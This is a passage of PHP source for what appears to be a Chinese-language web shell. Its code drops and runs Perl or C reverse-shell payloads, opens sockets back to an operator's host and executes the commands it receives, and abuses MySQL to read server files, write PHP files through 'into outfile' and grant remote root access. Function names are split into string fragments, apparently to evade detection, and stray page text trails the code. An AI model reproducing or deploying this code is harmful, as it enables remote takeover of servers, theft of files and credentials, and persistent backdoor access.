'; if ($GLOBALS['_POST']['use'] == '1') { $pl_code = StringHandler::getCode('pgone'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ' , 'wb' , Decrypt::run($pl_code)) ? '创建/tmp/dyAeLWNJ成功
' : '创建/tmp/dyAeLWNJ失败
'; $perl_path = Foundation::DeMarcia('which perl'); $perl_path = $perl_path ? chop($perl_path) : 'perl'; @unlink('/tmp/dyAeLWNJ.c'); Foundation::DeMarcia($perl_path . ' /tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &'); $result .= '母舰呼叫完成,请检查通讯结果。'; } if ($GLOBALS['_POST']['use'] == '2') { $c_code = StringHandler::getCode('gai'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ.c' , 'wb' , Decrypt::run($c_code)) ? '创建/tmp/dyAeLWNJ.c成功
' : '创建/tmp/dyAeLWNJ.c失败
'; Foundation::DeMarcia('gcc -o /tmp/dyAeLWNJ /tmp/dyAeLWNJ.c'); @unlink('/tmp/dyAeLWNJ.c'); $result .= Foundation::DeMarcia('/tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &') ? 'nc -vv -l ' . $target_port : '执行命令失败'; } if ($GLOBALS['_POST']['use'] == '3') { if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or self::$htmlClass->tips("缺少相关模块" , '/?action=flyj'); } else { @dl('sockets.so') or self::$htmlClass->tips("缺少模块" , '/?action=flyj'); } } if ($system == "WIN") { $env = ['path' => 'c:\\windows\\system32']; } else { $env = ['PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin']; } $desc = [ 0 => ["pipe" , "r"] , 1 => ["pipe" , "w"] , 2 => ["pipe" , "w"] , ]; $host = gethostbyname($target_ip); $proto = getprotobyname("tcp"); $a = 'soc' . 'ket' . '_' . 'cre' . 'ate'; if (($sock = $a(AF_INET , SOCK_STREAM , $proto)) < 0) { die("与主舰的通讯建立失败"); } if (($ret = socket_connect($sock , $host , $target_port)) < 0) { die("通讯建立失败"); } else { $cwd = str_replace('\\' , '/' , dirname(__FILE__)); while ($cmd = socket_read($sock , 65535 , $proto)) { $process = proc_open($cmd , $desc , $pipes , $cwd , $env); if (is_resource($process)) { fwrite($pipes[0] , $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock , $msg , strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock , $msg , strlen($msg)); proc_close($process); } } } } if ($GLOBALS['_POST']['use'] == '4') { $result .= '
'; $fp = fsockopen($target_ip , $target_port , $errno , $errstr); if (!$fp) { $result .= "无法打开socket连接"; } else { $username = get_current_user(); $file_path = THEPATH; $host = $_SERVER['SERVER_NAME']; while (!feof($fp)) { $b = 'fp' . 'uts'; $b($fp , " [$username@$host:$file_path]# "); $result = fgets($fp , 4096); $message = Foundation::DeMarcia($result); $b($fp , " --> " . $message . "\n"); } fclose($fp); } $result .= '
'; } } return $result; } public function moneyManage () { $message = ''; $money_return = ''; $flag = isset($GLOBALS['_POST']['host']) && isset($GLOBALS['_POST']['user']); $target_host = $flag ? Decrypt::run($GLOBALS['_POST']['host']) : 'localhost'; $target_user = $flag ? Decrypt::run($GLOBALS['_POST']['user']) : 'root'; $target_pass = $flag ? Decrypt::run($GLOBALS['_POST']['pass']) : ''; $target_name = $flag ? Decrypt::run($GLOBALS['_POST']['data']) : 'mysql'; $target_port = $flag ? Decrypt::run($GLOBALS['_POST']['port']) : '3306'; $sql = $flag ? Decrypt::run($GLOBALS['_POST']['content']) : 'select version();'; $ap = 'mys' . 'ql_co' . 'nnent'; $ao = 'mys' . 'ql_se' . 'lect_db'; $ai = 'my' . 'sq' . 'l_qu' . 'ery'; $au = 'my' . 'sq' . 'l_fe' . 'tch_ar' . 'ray'; $ay = 'm' . 'ys' . 'ql_er' . 'ror'; if ($flag) { if ($conn = mysql_connect($target_host . ':' . $target_port , $target_user , $target_pass)) { @$ao($target_name); } else { self::$htmlClass->tips('连接MYSQL失败' , '?action=sjcx'); } } $down_file = 'c:/windows/homework/kaydenkdross.avi'; if (!empty($GLOBALS['_POST']['downfile'])) { $down_file = self::$fileClass->filePathFormat(urldecode(Decrypt::run(urldecode($GLOBALS['_POST']['downfile'])))); $bin_path = bin2hex($down_file); $query = "select load_file(0x$bin_path)"; if ($money_return = @$ai($query , $conn)) { $k = 0; $down_code = ''; while ($row = @$au($money_return)) { $down_code .= $row[$k]; $k ++; } if ($down_code) { $file_down = basename($down_file); if (!$file_down) $file_down = 'envl.tmp'; $array = explode('.' , $file_down); $array_end = array_pop($array); header('Content-type: application/x-' . $array_end); header('Content-Disposition: attachment; filename=' . $file_down); header('Content-Length: ' . strlen($down_code)); echo $down_code; exit; } else { self::$htmlClass->tips("文件查询失败,请检查 mysql secure-file-priv 配置" , "?action=sjcx&type=d"); } } else self::$htmlClass->tips("文件下载失败" , "?action=sjcx&type=d"); } $type = isset($GLOBALS['_GET']['type']) ? $GLOBALS['_GET']['type'] : ''; $result = <<
function nFull(i){Str = new Array(11);Str[0] = "select version();";Str[1] = "select *** FROM user into outfile 'D:/web/iis.txt'";Str[2] = "select '' into outfile 'F:/web/123.php';";Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";nform.content.value = Str[i];return true;}
满分 5 分
20k 个评分